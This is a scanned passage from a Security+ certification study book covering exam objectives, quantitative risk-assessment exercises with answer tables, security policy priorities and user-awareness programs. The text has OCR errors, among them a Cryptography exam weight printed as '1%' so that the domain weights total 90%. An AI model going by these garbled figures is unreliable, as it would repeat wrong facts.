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Dear Reader,

Thank you for choosing Security Administrator Street Smarts: A Real World Guide to
CompTIA Security+ Skills, 3rd Edition. This book is part of a family of premium-quality
Sybex books, all of which are written by outstanding authors who combine practical
experience with a gift for teaching.

Sybex was founded in 1976. More than 30 years later, we’re still committed to producing
consistently exceptional books. With each of our titles, we’re working hard to set a new
standard for the industry. From the paper we print on, to the authors we work with, our
goal is to bring you the best books available.

I hope you see all that reflected in these pages. I’'d be very interested to hear your
comments and get your feedback on how we’re doing. Feel free to let me know what you
think about this or any other Sybex book by sending me an email at nedde@wiley.com. If
you think you’ve found a technical error in this book, please visit http://sybex.custhelp
.com. Customer feedback is critical to our efforts at Sybex.

Best regards,

Vice President and Publisher
Sybex, an Imprint of Wiley
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Introduction

The Security+ certification was developed by the Computer Technology Industry
Association (CompTIA) to provide an industry-wide means of certifying the competency of
computer and network administrators in the basics of securing their systems and networks.
The security professional’s job is to protect the confidentiality, integrity, and availability of
the organization’s valuable information assets.

According to CompTTA, the Security+ certification

... validates knowledge of communication security, infrastructure security,
cryptography, operational security, and general security concepts. It is

an international, vendor-neutral certification that is taught at colleges,
universities and commercial training centers around the world.

Although not a prerequisite, it is recommended that CompTTA
Security+ candidates have at least two years on-the-job networking
experience, with an emphasis on security. The CompTTA Network+
certification is also recommended.

Because human error is the number one cause for a network security
breach, CompTIA Security+ is recognized by the technology community
as a valuable credential that proves competency with information security.

Major corporations such as Sun, IBM/Tivoli Software Group,
Symantec, Motorola, Hitachi Electronics Services, and VeriSign value the
CompTTA Security+ certification and recommend or require it of their IT
employees.

Although most books that target certification candidates present material for you to
memorize before the exam, this book is different. It guides you through procedures and
tasks that solidify related concepts, thus allowing you to devote your memorization efforts
to more abstract theories because you’ve mastered the practical topics through doing. Even
if you do not aspire to become a security professional, this book can be a valuable primer
for your career.

What Is Security+ Certification?

The Security+ certification was created to offer a foundational step into the complex world
of securing information technology systems. Security+ candidates must take the Security+
exam (Exam #SY0-301), which covers various security concepts. This exam was updated
for 2011 to include a broader range of security-related IT issues, like forensics, cyber
security, botnets, and emerging threats. In addition, the exam was updated to cover recent
and newer technologies.
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A detailed list of the Security+ SY0-301 exam objectives is presented in
A% this introduction; see the section “The Security+ Exam Objectives.”

Obtaining the Security+ certification does not mean you can provide sufficient system
and network security services to a company. In fact, this is just the first step toward true
technical knowledge and experience. By obtaining Security+ certification, you will be
able to obtain more computer and network security administration experience in order to
pursue more complex and in-depth knowledge and certifications.

For the latest pricing on the exam and updates to the registration procedures, call
either Prometric at (866) 776-6387 or (800) 776-4276 or Pearson VUE at (877) 551-7587.
You can also go to either www.2test.com or www.prometric.com (for Prometric) or www
.vue.com (for Pearson VUE) for additional information or to register online. If you have
further questions about the scope of the exams or related CompTIA programs, refer to
the CompTTA website at www. comptia.org.

Is This Book for You?

Security Administrator Street Smarts, Third Edition is designed to give you insight into

the world of a typical system and network security technician by walking you through
some of the daily tasks you can expect on the job. We recommend that you invest in certain
equipment to get the full effect from this book. However, much value can be derived

from simply reading through the tasks without performing the steps on live equipment.
Organized classes and study groups are the ideal structures for obtaining and practicing
with the recommended equipment.

Deluxe Study Guide, Second Edition, both from Sybex (2011), are
recommended companions to this book in your studies for the CompTIA
Security+ certification.

% The CompTIA Security+ Study Guide, Fifth Edition and CompTIA Security+
TE

How This Book Is Organized

This book is organized into an initial system-setup procedure followed by 10 phases. Each
phase is separated into individual tasks. The phases represent broad categories under which
related responsibilities are grouped. The tasks within each phase lead you step by step
through the processes required for successful completion. When performed in order, the
tasks in this book approximate those required by a system security administrator over an
extended period of time. The phases and their descriptions are as follows:
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Phase 1—The Grunt Work of Security presents the initial and essential objectives
that a security professional needs to have in place to understand, establish the basis for,
implement, and enforce security within an organization.

Phase 2—Hardening Systems shows you where the most common vulnerabilities
exist within a system: the attack points, how to identify them, and how to minimize
the attack surface of a system. This phase also addresses system virtualization.

Phase 3—Malicious Software shows you how to implement filters, scanners, and
other tools to defend the system against inbound threats, such as viruses, worms,
spyware, and rootkits.

Phase 4—Secure Storage provides real-world tools and techniques to ensure that
data, while residing on a system, will remain secure. Discussed are the use of file,
folder, and whole-disk encryption; the assignment of permissions following the
principle of least privilege; and the implementation of fault tolerance.

Phase 5—Managing User Accounts presents procedures related to user accounts

that every computer network should have implemented. These procedures include
implementing a strong password policy and securing default user accounts, such as the
Administrator and the Guest accounts.

Phase 6—Network Security shows you how to configure encryption for data

while it’s in transit on the corporate network, and between the telecommuter and

the corporate headquarters (via VPNs) using various VPN technologies, including the
newer Advanced Encryption Standard (AES). Further, it shows how to configure basic
firewall rules and how to configure a wireless network with acceptable security using

802.11i and WPA.

Phase 7—Securing Internet Activity shows you how to secure your Microsoft Internet
Explorer, email, and IP settings, and how to use digital certificates in a Public Key
Infrastructure (PKI) environment.

Phase 8—Security Testing presents the use of security assessment tools to evaluate
the general strength of a system, and penetration-testing tools to view your systems as
an attacker would see them.

Phase 9—Investigating Incidents shows you how to operate like a forensics
investigator and how to track down and uncover hidden details of some earlier
security-related event. You will learn how to configure auditing and review audit
logs, how to perform a memory dump to record the contents of physical RAM, how
to recover deleted files and folders, and how to use and understand a sniffer on the
network to view the network traffic.

Phase 10—Security Troubleshooting examines multiple procedures to perform
disaster recovery and focuses on Safe mode, Last Known Good Configuration, and
System Recovery. It also looks at procedures and tools to sanitize media for secure
destruction of confidential data to allow for reuse of magnetic media. Finally, this
phase takes a look at implementing a host-based intrusion detection system (HIDS).
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Each task in this book is organized into sections aimed at giving you what you need
when you need it. The first section introduces you to the task and any key concepts that
can assist you in understanding the underlying technology and the overall procedure. The
following describes the remaining sections:

s Scenario—This section places you in the shoes of the PC support technician, describing
a situation in which you will likely find yourself. The scenario is closely related to and
often solved by the task at hand.

s Scope of Task—This section is all about preparing for the task. It gives you an idea of
how much time is required to complete the task, what setup procedure is needed before
beginning, and any concerns or issues to look out for.

s Procedure—This is the meat of the task itself. This section lists the equipment required
to perform the task in a lab environment. It also gives you the ordered steps to
complete the task.

»  Criteria for Completion—This final section briefly explains the outcome you should
expect after completing the task. Any deviation from the result described is an
excellent reason to perform the task again and watch for sources of the variation.

How to Contact the Publisher

Sybex welcomes feedback on all of its titles. Visit the Sybex website at www.sybex. com for
book updates and additional certification information. You’ll also find forms you can use to
submit comments or suggestions regarding this or any other Sybex title.

The Security+ Exam Objectives

The following presents the detailed exam objectives for the Security+ (SY0-301) exam.

)’ At the beginning of each of the phases of this book, we’ve included
AéTE the supported domains of the Security+ exam objectives. Exam objectives
are subject to change at any time without prior notice and at CompTIA's
sole discretion. Please visit the Security+ Certification page of CompTIA's
website (http://www.comptia.org/Libraries/Exam_Objectives/
CompTIA_Security_SY0-301.sf1b.ashx) for the most current listing of
exam objectives.

The following table lists the domains measured by this examination and the extent to
which they are represented on the exam. A more detailed breakdown of the exam objectives
follows the table.


http://www.sybex.com
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Domain

Percentage of examination

1.0 Network Security

2.0 Compliance and Operational Security

3.0 Threats and Vulnerabilities

4.0 Application, Data and Host Security

5.0 Access Control and Identity Management

6.0 Cryptography

21%

18%

21%

16%

13%

1%

Domain 1.0: Network Security

1.1 Explain the security function and purpose of network devices and
technologies

Firewalls

Routers

Switches

Load balancers
Proxies

Web security gateways

VPN concentrators

NIDS and NIPS (behavior based, signature based, anomaly based, heuristic)

Protocol analyzers

Sniffers

Spam filter, all-in-one security appliances
Web application firewall vs. network firewall

URL filtering, content inspection, malware inspection

1.2 Apply and implement secure network administration principles

Rule-based management
Firewall rules

VLAN management
Secure router configuration

Access control lists
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= Port security

= 802.1x

= Flood guards

= Loop protection

= Implicit deny

= Prevent network bridging by network separation

= Log analysis

1.3 Distinguish and differentiate network design elements and compounds

= DMZ

= Subnetting
= VLAN

= NAT

= Remote Access

s Telephony

= NAC

= Virtualization

s Cloud computing
= Platform as a service
= Software as a service

s Infrastructure as a service

1.4 Implement and use common protocols

s [PSec

=  SNMP
= SSH

= DNS

= TLS

= SSL

= TCP/IP
= FTPS

= HTTPS
= SFTP

= SCP

= ICMP

s IPv4 vs. IPv6
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1.5 Identify commonly used default network ports

« FTP

= SFTP

= FTPS

=« TFTP

» TELNET
« HTTP

= HTTPS

= SCP

= SSH

= NetBIOS

1.6 Implement wireless network in a secure manner

=  WPA

= WPA2

= WEP

= EAP

= DPEAP

= LEAP

= MAC filter

s SSID broadcast
= TKIP

= CCMP

= Antenna placement

s Power level controls

Domain 2.0 Compliance and Operational Security
2.1 Explain risk-related concepts
= Control types
s Technical
=  Management
= Operational
= False positives
= Importance of policies in reducing risk
= Privacy policy

= Acceptable use

XXXi
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= Security policy

= Mandatory vacations
= Job rotation

= Separation of duties

= Least privilege

Risk calculation

= Likelihood

= ALE

= Impact

Quantitative vs. qualitative
Risk avoidance, transference, acceptance, mitigation, deterrence

Risks associated to cloud computing and virtualization

2.2 Carry out appropriate risk mitigation strategies

Implement security controls based on risk
Change management

Incident management

User rights and permissions reviews
Perform routine audits

Implement policies and procedures to prevent data loss or theft

2.3 Execute appropriate incident response procedures

Basic forensic procedures

s Order of volatility

= Capture system image

s Network traffic and logs
= Capture video

= Record time offset

s Take hashes

= Screenshots

= Witnesses

s Track man hours and expense
Damage and loss control
Chain of custody

Incident response: first responder
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2.4 Explain the importance of security-related awareness and training
= Security policy training and procedures
= Personally identifiable information
= Information classification: Sensitivity of data (hard or soft)
s Data labeling, handling, and disposal
s Compliance with laws, best practices, and standards
= User habits
s Password behaviors
= Data handling
s Clean desk policies
= Prevent tailgating
s Personally owned devices
s Threat awareness
= New viruses
= Phishing attacks
s Zero days exploits

s Use of social networking and P2P

2.5 Compare and contrast aspects of business continuity
= Business impact analysis

= Removing single points of failure

= Business continuity planning and testing

= Continuity of operations

= Disaster recovery

= IT contingency planning

= Succession planning

2.6 Explain the impact and proper use of environmental controls
= HVAC

= Fire suppression

= EMIshielding

= Hot and cold aisles

= Environmental monitoring

s Temperature and humidity controls

= Video monitoring

XXXiii
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2.7 Execute disaster recovery plans and procedures
= Backup/backout contingency plans or policies
= Backups, execution, and frequency
= Redundancy and fault tolerance

s Hardware

= RAID

s Clustering

= Load balancing

= Servers
= High availability
= Cold site, hot site, warm site

= Mean time to restore, mean time between failures, recovery time objectives, and recov-
ery point objectives

2.8 Exemplify the concepts of confidentiality, integrity, and availability (CIA)

Domain 3.0 Threats and Vulnerabilities

3.1 Analyze and differentiate among types of malware
s Adware

= Virus

= Worms

= Spyware

= Trojan

= Rootkits

= Backdoors

= Logic bomb

= Botnets

3.2 Analyze and differentiate among types of attacks
s Man-in-the-middle

] DDoS
] DoS
= Replay

= Smurf attack
= Spoofing

= Spam



3.3 Analyze and differentiate among types of social engineering attacks

Phishing

Spim

Vishing

Spear phishing

Xmas attack

Pharming

Privilege escalation

Malicious insider threat

DNS poisoning and ARP poisoning
Transitive access

Client-side attacks

Shoulder surfing
Dumpster diving
Tailgating
Impersonation
Hoaxes

Whaling
Vishing

Introduction

3.4 Analyze and differentiate among types of wireless attacks

Rogue access points
Interference

Evil twin

War driving
Bluejacking
Bluesnarfing

War chalking

IV attack

Packet sniffing

3.5 Analyze and differentiate among types of application attacks

Cross-site scripting
SQL injection
LDAP injection

XXXV
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= XML injection

= Directory traversal/command injection
= Buffer overflow

s Zero day

= Cookies and attachments

= Malicious add-ons

= Session hijacking

s Header manipulation

3.6 Analyze and differentiate among types of mitigation and deterrent
techniques

= Manual bypassing of electronic controls
»  Failsafe/secure vs. failopen
= Monitoring system logs
= Eventlogs
= Audit logs
= Security logs
s Accesslogs
= Physical security
s Hardware locks
= Mantraps
= Video surveillance
= Fencing
= Proximity readers
= Access list
= Hardening
= Disabling unnecessary services
= Protecting management interfaces and applications
= Password protection
s Disabling unnecessary accounts
= Portsecurity
= MAC limiting and filtering
= 802.1x

= Disabling unused ports



= Security posture

= Initial baseline configuration

= Continuous security monitoring

= Remediation

= Reporting

= Alarms
s Alerts
s Trends

= Detection controls vs. prevention controls

s IDS vs. IPS

= Camera vs. guard

Introduction
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3.7 Implement assessment tools and techniques to discover security threats

and vulnerabilities

= Vulnerability scanning and interpret results

= Tools
= Protocol analyzer
= Sniffer
= Vulnerability scanner
= Honeypots
= Honeynets
= Port scanner
= Risk calculations
= Threat vs. likelihood
= Assessment types
= Risk
s Threat
= Vulnerability
= Assessment technique
= Baseline reporting
= Code review
= Determine attack surface
= Architecture

= Design reviews
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3.8 Within the realm of vulnerability assessments, explain the proper use of
penetration testing vs. vulnerability scanning

= Penetration testing
s Verify a threat exists
= Bypass security controls
= Actively test security controls
= Exploiting vulnerabilities
= Vulnerability scanning
= Passively testing security controls
= Identify vulnerability
s Identify lack of security controls

s Identify common misconfiguration

= Black box
= White box
= Gray box

Domain 4.0 Application, Data and Host Security
4.1 Explain the importance of application security

= Fuzzing

= Secure coding concepts

s Error and exception handling

= Input validation

»  Cross-site scripting prevention

s Cross-site Request Forgery (XSRF) prevention

= Application configuration baseline (proper settings)

= Application hardening

= Application patch management

4.2 Carry out appropriate procedures to establish host security
= Operating system security and settings
= Anti-malware

= Anti-virus

= Anti-spam

= Anti-spyware

s Pop-up blockers

s Host-based firewalls
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Patch management

Hardware security

Cable locks
Safe

Locking cabinets

Host software baselining
Mobile devices

Screen lock

Strong password
Device encryption
Remote wipe/sanitation
Voice encryption

GPS tracking

Virtualization

4.3 Explain the importance of data security
Data Loss Prevention (DLP)

Data encryption

Full disk
Database
Individual files
Removable media
Mobile devices

Hardware-based encryption devices

TPM

HSM

USB encryption
Hard drive

Cloud computing

Domain 5.0 Access Control and Identity Management
5.1 Explain the function and purpose of authentication services
RADIUS

TACACS

TACACS+

XXXiX
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Kerberos
= LDAP
XTACACS

5.2 Explain the fundamental concepts and best practices related to
authentication, authorization, and access control

= Identification vs. authentication

= Authentication (single factor) and authorization
= Multifactor authentication

= Biometrics

= Tokens

»  Common access card

s Personal identification verification card
= Smart card

s Least privilege

= Separation of duties

= Single sign-on

= ACLs

= Access control

= Mandatory access control

= Discretionary access control

= Role/rule-based access control

= Implicit deny

= Time of day restrictions

s Trusted OS

= Mandatory vacations

= Job rotation

5.3 Implement appropriate security controls when performing account
management

= Mitigates issues associated with users with multiple account/roles
= Account policy enforcement

s Password complexity

= Expiration

= Recovery
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= Length
= Disablement
= Lockout
s Group-based privileges

s User-assigned privileges

Domain 6.0 Cryptography

6.1 Summarize general cryptography concepts
= Symmetric vs. asymmetric

s Fundamental differences and encryption methods
= Block vs. stream

= Transport encryption

= Non-repudiation

= Hashing

= Key escrow

= Steganography

= Digital signatures

= Use of proven technologies

= Elliptic curve and quantum cryptography

6.2 Use and apply appropriate cryptographic tools and products
s WEP vs. WPA/WPA2 and preshared key

= MDS

= SHA

= RIPEMD
= AES

= DES

= 3DES

= HMAC

= RSA

= RC4

= Onetime pads
« CHAP

= PAP

= NTLM

xli
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= NTLMwv2

= Blowfish

= PGP/GPG

= Whole disk encryption
= TwoFish

s Comparative strengths of algorithms

= Use of algorithms with transport encryption

= SSL

= TLS

s [PSec

= SSH

= HTTPS

6.3 Explain the core concepts of public key infrastructure

s Certificate authorities and digital certificates

= CA
] CRLs
= PKI

= Recovery agent
= Public key

= Private key

= Registration

= Key escrow

s Trust models

6.4 Implement PKI, certificate management, and associated components

s Certificate authorities and digital certificates

= CA
] CRLs
= PKI

= Recovery agent
= Public key

= Private keys

= Registration

»  Key escrow

= Trust models



The Grunt Work
of Security




There is an old saying that success is doing what’s right at

the right time. While the individual who created this quote
may not have been thinking of security in particular, security
professionals can most certainly learn from this saying.
Security is about doing the right thing at the right time. Before you can run a password-
cracking tool, perform penetration tests, or fire up a vulnerability scanner, you must cover
some basic groundwork. That grunt work is the subject of this first phase.

The groundwork of security requires that you know what is worth securing. Companies
don’t have unlimited funds, so a big part of the security process is finding what is most
critical to the organization and focusing your security efforts on these assets. Finding
what’s critical is only the first step. You will next need to write a policy that matches up
to your findings. Is that enough? No. Policies have no meaning if users don’t know they
exist. That’s where user awareness comes in. Finally, you can have great ideas, but unless
they are written down they have little value. In other words, documentation is important
in everything you do. These are the tasks that we will examine in this phase of the security
process. Let’s get started by performing a basic risk assessment.

The tasks in this phase map to Domain 2 in the objectives for the CompTIA
TE Security+ exam (www.comptia.org/certifications/1isted/security.aspx).

Task 1.1: Performing an Initial
Risk Assessment

Risk assessment can be achieved by one of two methods: qualitative or quantitative.
Qualitative assessment does not attempt to assign dollar values to components of the risk
analysis. It ranks the seriousness of threats and sensitivity of assets into grades or classes,
such as low, medium, or high.

Quantitative assessment deals with numbers and dollar amounts. It attempts to assign
a cost (monetary value) to the elements of risk assessment and to the assets and threats of a
risk analysis. The quantitative assessment process involves these three steps:

1. Estimate potential losses—Single Loss Expectancy (SLE) = Asset Value x Exposure
Factor.
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2. Conduct a threat analysis—The goal here is to estimate the Annual Rate of Occurrence
(ARO). This numeric value represents how many times the event is expected to happen
in one year.

3. Determine Annual Loss Expectancy (ALE)—This formula is calculated as follows:
ALE = Single Loss Expectancy (SLE) x Annual Rate of Occurrence (ARO).

The goal of this task is to conduct these three steps of the quantitative risk assessment
process.

Scenario

You have been asked to perform a quantitative risk assessment for a small startup social
networking firm.

Scope of Task

Duration

This task should take about 30 minutes.

Setup

For this task you need access to a pen and paper. In real life, assessments require
knowledge of assets, an analysis of threats, and a team of people to help identify what

is truly important to the organization. These people should be from key departments of

the company so that you achieve a rounded view. For this task, consider what personal
information you would need. Consider how you would gather this information in a real-life
risk assessment. Common methods include surveys, interviews, one-on-one meetings, and
group meetings.

Caveat

In real life, risk assessment is a complex process that is usually done with the aid of
software tools that perform all the calculations.

Procedure

In this task, you will learn how to perform a quantitative risk assessment.

Equipment Used
For this task, you must have:
= Paper

= Pen or pencil
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Details

This task introduces you to the risk assessment process. This is a critical step in the security
process since an organization must determine what is most critical and apply

cost-effective countermeasures to protect those assets. A quantitative risk assessment
attempts to put dollar amounts on those risks, which makes it a valuable tool when
working with management to justify the purchase of countermeasures.

Estimating Potential Loss

Your first step in the risk assessment process is to estimate potential loss. You do
so by multiplying the asset value by the exposure factor. The asset value is what the asset
is worth. The exposure factor is the cost of the asset lost or damaged in one single attack.
For example, if the threat is a computer virus and the asset is a server used for customer
profiles that is valued at $32,000 with an exposure factor of 0.25, the formula would be
as follows: Single Loss Expectancy = Asset Value x Exposure Factor, or $32,000 x 0.25 =
$8,000. The SLE, which represents what one computer virus attack would cost,
is $8,000.

Now that you have a better idea of how the process works, take a look at Table 1.1,
which shows a variety of threats and their corresponding exposure factors.

With a list of exposure factors, you are now ready to calculate the SLE for some
common systems. These are shown in Table 1.2. Complete Table 1.2 using the information
provided by Table 1.1.

)/ Answers to SLE values in Table 1.2 can be found in Table 1.4.

I

TABLE 1.1 ThreatLevel and Exposure Factor (EF)

Threat Level or Vulnerability EF

5 = Stolen or compromised data 0.90
4 = Hardware failure 0.25
3 =Virus or malware 0.50
2 = DosS attack 0.25

1= Short-term outage 0.05
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TABLE 1.2 Calculating Single Loss Expectancies (SLE)

IT Asset Name Asset Value Threat EF SLE Value
Symantec’s Enterprise Firewall $25,000 2 0.25
WAN circuits (3 remote call centers) $25,000 4 0.25
Cisco 6500 switch/router $160,000 4 0.25
LAN connectivity $100,000 4 0.25
LAN VPN connectivity $25,000 4 0.25
Dell servers—quad-core processors $32,000 2 0.25
Linux servers $20,000 2 0.25
End-user workstations (HW and SW) $300,000 1 0.05
Microsoft SQL Server 2008 $20,000 3 0.50
Oracle SQL data (customer data) $500,000 5 0.90

Conducting a Threat Analysis

With the calculations completed for SLE, the next step is to determine the ARO. The ARO
is the average number of times you might expect a particular event to happen in a year.
Here’s an example: Galveston typically gets hit with a hurricane at least once every 10
years. Therefore, the chance for a hurricane is 0.10.

Complete Table 1.3 to practice computing the ARO. Use the following information:

Stolen Equipment Based on information provided by actuary tables, there is the
possibility that your organization will lose equipment or have its equipment compromised
once in a 5-year period.

Hardware Failure By examining past failure rates of equipment, you have determined that
it has happened twice in the last 8 years.

Computer Virus Historical data shows that the company has been seriously affected only
once in the last 2 years.

DoS Attack Your research has shown that the average company in your field is affected by
denial-of-service (DoS)/Botnet attacks up to three times every 12 years.

Short-Term Outage Trouble tickets from the help desk indicate that three-fourths of all
trouble tickets in one year are related to some type of outage.
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You can check your answers against the ARO Value column in Table 1.4.

TABLE 1.3 Annual Rate of Occurrence (ARO)

Threat Level or Vulnerability

ARO Value

5 = Stolen or compromised data

4 = Hardware failure

3 = Virus or malware

2 = DoS attack

1= Short-term outage

Determining the Annual Loss Expectancy

Armed with SLE values and ARO values, you are now ready to complete the final steps of

the risk assessment process:

1. To calculate ALE you will use the following formula: ALE = Single Loss Expectancy
(SLE) x Annual Rate of Occurrence (ARO). For example, if the SLE is $1,000 and the
ARO is 0.25, the formula would be $1,000 x 0.25 = $250 ALE.

2. Using the information gathered earlier in this task, complete Table 1.4.

The answers forTable 1.4 can be found inTable 1.5. Given the risk calculated
TE forTable 1.5, note that the customer’s database has the largest ALE.

TABLE 1.4 Calculating Annual Loss Expectancies (ALE)

IT Asset Name SLE Value Threat ARO Value ALE Value
Symantec’s Enterprise $6,250 2 = DoS attack 0.25

Firewall

WAN circuits (3 remote $6,250 4 = Hardware failure 0.25

call centers)

Cisco 6500 switch/router $40,000 4 = Hardware failure 0.25

LAN connectivity $25,000 4 = Hardware failure 0.25

LAN VPN connectivity $6,250 4 = Hardware failure 0.25
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IT Asset Name SLE Value Threat ARO Value ALE Value

Dell servers—quad-core $8,000 2 = DoS attack 0.25

processors

Linux servers $5,000 2 = DoS attack 0.25

End-user workstations (HW  $15,000 1= Short-term 0.75

and SW) outage

Microsoft SQL Server 2008  $10,000 3 =Virus or malware 0.5

Oracle SQL data (customer  $450,000 5 = Stolen or 0.2

data) compromised data

TABLE 1.5 Calculating Annual Loss Expectancies results
IT Asset Name SLE Value Threat ARO Value ALE Value
Symantec’s Enterprise  $6,250 2 = DoS attack 0.25 $1,562.50
Firewall
WAN circuits (3 remote  $6,250 4 = Hardware failure  0.25 $1,562.50
call centers)
Cisco 6500 switch/ $40,000 4 = Hardware failure  0.25 $10,000
router
LAN connectivity $25,000 4 = Hardware failure  0.25 $6,250
LAN VPN connectivity  $6,250 4 = Hardware failure  0.25 $1,562.50
Dell servers—quad- $8,000 2 = DoS attack 0.25 $2,000
core processors
Linux servers $5,000 2 = DoS attack 0.25 $1,250
End-user workstations  $15,000 1= Short-term outage 0.75 $11,250
(HW and SW)
Microsoft SQL Server $10,000 3 =Virus or malware 0.5 5,000
2008
Oracle SQL data $450,000 5 = Stolen or 0.2 $90,000

(customer data)

compromised data
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Criteria for Completion

You have completed this task when you have calculated the SLEs, AROs, and ALEs for a
range of I'T products.

Task 1.2: Determining Which Security
Policy Is Most Important

Security policies are the lifeblood of any organization. Once you’ve performed a risk
assessment, you can begin to lock in these findings in the security policy. The policy should
spell out what should be protected, how it should be protected, and what value it has to
senior management. Be sure to specify these concerns in written documents. You must also
verify that the policies comply with all federal, state, and local laws.

Policies play such an important role because they put everyone on the same page and
make it clear where senior management stands on specific issues. Policies help define how
security is perceived by those within an organization. Policies must flow from the top of the
organization because senior management is ultimately responsible.

Scenario

Management was pleased with your recent risk assessment, and you have been asked to
make some basic security policy recommendations. Any given company has only a limited
amount of funds, so your real task is to determine where the funds you can spend on
security will have the most benefit. The risk assessment process is one way to assign a value
to assets and to the threats those assets face.

Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task you need only to read through the scenario and determine what you think is
the best solution.

Caveat

Well-written policies should spell out who is responsible for security, what needs to be
protected, and what constitutes an acceptable level of risk. When creating policies, make
sure that what you write is something that users can really do. For example, if you write
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a policy that states users must select complex passwords, you must make sure that the
operating system will support that feature.

Procedure

In this task, you will learn to rate security issues based on level of concern and determine
where to start in the security-policy process.

Equipment Used
For this task, you must have:

= A pen or pencil

Details

This task will introduce you to basic policy design and help you understand the importance
of specific policies to the organization. The following organization and company profile
will be used to complete this task.

Company Profile

Your company has all of its potential pinned to several unique products in FDA-approved
trials. If the products are approved for use, the company will be able to obtain additional
funding. Recently, a sensitive internal document was found posted on the Internet. The
company is worried that some of this information may have ended up in the hands of

a competitor. If key proprietary information was leaked, it could endanger the future of the
company.

Company Overview

Your talks with senior management revealed the following: The company is betting
everything on the success of these products. Most of its key employees have been stolen
away from competing firms. These employees were originally attracted by the promise of
huge stock options. Human Resources (HR) has all these records, and they have to keep
track of any payouts if they occur.

The company has been lucky—venture capital has poured in. All of this capital
has been invested in research and development (R&D). Once a design is pulled together,
the company locks in the documentation. It doesn’t actually build the product in the
United States; a subsidiary in South Korea assembles the design. The finished product
returns to the United States for final tests, and then the product is submitted for
FDA trials.

Because the company is new and poised for growth, the rented office and lab space are
full. There are several entrances to the building, and people can come and go through any
of them. Employees often work from home. Employees connect to the office from home via
virtual private networks (VPNs). They have been required to sign an acceptable-use policy
that specifies for what purposes they can use the network and its resources.
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There is no full-time network administrator; those responsibilities fall on a research
assistant who has experience managing systems in a college environment (but not in a
high-security environment). The network consists of one large local area network (LAN)
connected to the Internet through a firewall appliance—except for the VPNs, where
the firewall still has its factory-default configuration. Employees must use two-factor
authentication to log into local computers, and laptops have biometric authentication.

Because a storm last year wiped out a competitor, the company called in a disaster-
recovery expert and backup policies were developed. The company also contracted with a
service bureau for its backup services, should the network go down because of a disaster.
This led the company to set up policy templates for other major areas, but policies have not
been completed.

Policy Development Overview

Once an organization has decided to develop security polices, the question that usually
comes to mind is, “What’s next?” The best place to start is to frame the policies within
some type of existing framework.

Two examples of such a framework are ISO 17799 and BS 7799. BS 7799 is a
recognized standard that breaks security policy into 10 categories. These include the
following;:

Business Continuity Planning This category addresses business continuity and disaster
recovery.

System Access Control This category addresses control of information, protection of
network resources, and the ability to detect unauthorized access.

System Development and Maintenance This category addresses the protection of
application data and the safeguards associated with confidentiality, integrity, and
availability of operational systems.

Physical and Environmental Security This category addresses the physical protection of
assets and the prevention of theft.

Compliance This category addresses the controls used to prevent the breach of any
federal, state, or local law.

Personal Security This category addresses the protection of individuals and the protection
from human error, theft, fraud, or misuse of facilities.

Security Organization This category addresses the need to manage information within
the company.

Computer and Network Management This category addresses the need to minimize the
risk of system failure and protect network systems.

Asset Classification and Control This category addresses the need to protect company assets.

Security Policy This category addresses the need for adequate policies to maintain security.
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A more specialized set of guidance documents would be the NIST Special
TE Publications 800 series documents. These are of general interest to the

computer security community.

Based on the information provided in the “Details” section of this task and the BS 7799
categories, you should complete Table 1.6. In the table you will find a listing for each of the
BS 7799 categories. Beside each category, list the level of importance of each of these items.
Use the following scale:

= 1—Low importance, should not be an immediate concern
s 2—Medium importance, requires attention

= 3—High importance, should be a priority

TABLE 1.6 Policy Action Iltems

Category Level of Concern

Business Continuity Planning

System Access Control

System Development and Maintenance

Physical and Environmental Security

Compliance

Personal Security

Security Organization

Computer and Network Management

Asset Classification and Control

Security Policy

% Answers will vary but should be similar to what is found in Table 1.7.
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TABLE 1.7 Policy Action ltems—Answers

Category Level of Concern

Business Continuity Planning 1

System Access Control 3

System Development and Maintenance 1

Physical and Environmental Security 3

Compliance 3

Personal Security 3

Security Organization 2

Computer and Network Management 2

Asset Classification and Control 3

Security Policy 2

% The SANS Institute has a great resource that can be used to develop
A TE specific policies. You'll find it at waw.sans.org/resources/policies/.

Best of all, it's free!

Criteria for Completion

You have completed this task when you have completed Table 1.7 and determined which
security concerns are most important.

Task 1.3: Establishing
a User-Awareness Program

Policies are not enough to protect an organization. Employees must develop user-awareness
programs so that other employees know about specific policies and are trained to carry out
actions specified in security policies. The overall process to accomplish this task is usually
referred to as security education, training, and awareness (SETA).
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Take, for example, a policy dictating that employees should access the Internet for
business use only. Management can dictate this as a policy, but how are end users going
to know? That’s where employee awareness comes in. Employee awareness could include
asking employees to sign an acceptable-use statement when they are hired; it might also
include periodic training and could even include warning banners that are displayed each
time an employee accesses the Internet. Awareness is about making sure that employees
know security policies exist, what they are, and what their purpose is.

Scenario

Your company has established basic security policies based on BS 7799 standards.
Management has now turned to you for help in developing an awareness program.

Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task you will need to have performed a risk assessment and developed policies.
Once policies are in place, you can start the training process.

Caveat

A study conducted by Ernst & Young found that more than 70 percent of companies
polled failed to list security awareness and training as top company initiatives. These same
companies reported that 72 percent of them had been affected by infected emails and
computer viruses. Good training and awareness would have reduced these numbers.

Procedure

In this task, you will be required to categorize and design a basic user-awareness program.

Equipment Used
For this task, you must have:

= A pen or pencil

Details

This task will provide you with details on how a security awareness program is developed
and give you the opportunity to develop key portions of the procedure.

User Awareness

It is sad but true that one of the least implemented and yet most useful parts of a
security policy is user awareness. Security must be kept at the forefront of employees’
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minds for a security program to work. This overall program is typically referred to

as SETA.

SETA is the responsibility of the chief security officer and consists of three elements:
education, training, and awareness. While these items can be categorized in many ways, the
National Institute of Standards and Technology (NIST) has developed some benchmark
procedures that perform such services. One such document is NIST 800-12. Chapter 13 of
that document contains relevant information. Table 1.8 contains information found in that

document.

TABLE 1.8 Security-Awareness Framework

Item Education Training Awareness
Attribute Why How What

Level Insight Knowledge Information
Objective Understanding Skill Exposure

Instruction method

Test measure

Usefulness timeline

Discussion, reading,
or practice

Essay

Long-term

Training, lecture, or
workshop

Applied learning,
problem solving

Mid-term

Posters, videos,
newsletters

Multiple-choice or
true/false tests

Short-term

Based on the information provided in Table 1.8, choose the correct category—education,
training, or awareness—for each item in Table 1.9.

TABLE 1.9 Security Awareness, Training, and Education

Item

Education

Training

Awareness

Trinkets printed with security slogans

Newsletters

Security+ certification

Bachelor’s degree in computer security

SANS 3-day seminar

CASP certification
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Item Education Training Awareness

T-shirts provided for good security practices
1-day security seminar at the local college
Quarterly security quiz with prize

2-year associate’s degree in security

Which of the items in Table 1.9 do you feel would be most useful to keep security
awareness at the forefront of users’ minds as they work day to day?

